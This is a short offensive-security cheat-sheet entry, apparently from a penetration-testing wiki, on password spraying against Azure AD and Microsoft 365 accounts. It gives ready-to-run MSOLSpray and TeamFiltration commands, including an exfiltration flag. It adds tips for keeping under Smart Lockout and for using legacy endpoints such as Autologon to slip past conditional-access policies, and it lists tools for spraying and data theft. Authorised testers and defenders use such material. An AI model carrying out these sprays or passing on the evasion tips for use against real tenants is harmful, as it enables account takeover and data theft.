With a validated user list, a low-and-slow spray of one or two common passwords across many accounts finds the weak credential without locking everyone out. The endpoint matters: some report Smart Lockout and MFA state, and legacy endpoints behave differently from modern ones.
Spraying#
# MSOLSpray against the Azure AD authentication endpoint; reports MFA/locked/disabled
Invoke-MSOLSpray -UserList users.txt -Password 'Autumn2026!'
# TeamFiltration spray + exfil
teamfiltration --spray --exfil --users users.txt --password 'Autumn2026!'
Exploitation notes#
- Keep to one password per lockout window across the whole list; Smart Lockout tracks per-account bad attempts, not per-source.
- MSOLSpray flags accounts that are valid-but-MFA, disabled, or locked, which triages the hits for you.
- The Autologon and other legacy-auth endpoints sometimes bypass conditional-access policies scoped to modern auth, so a credential that fails interactively may still work there.
Tools#
- MSOLSpray (dafthack): spray with state reporting.
- TeamFiltration / o365spray: spray and exfiltrate.
- AADInternals: sign-in against multiple endpoints.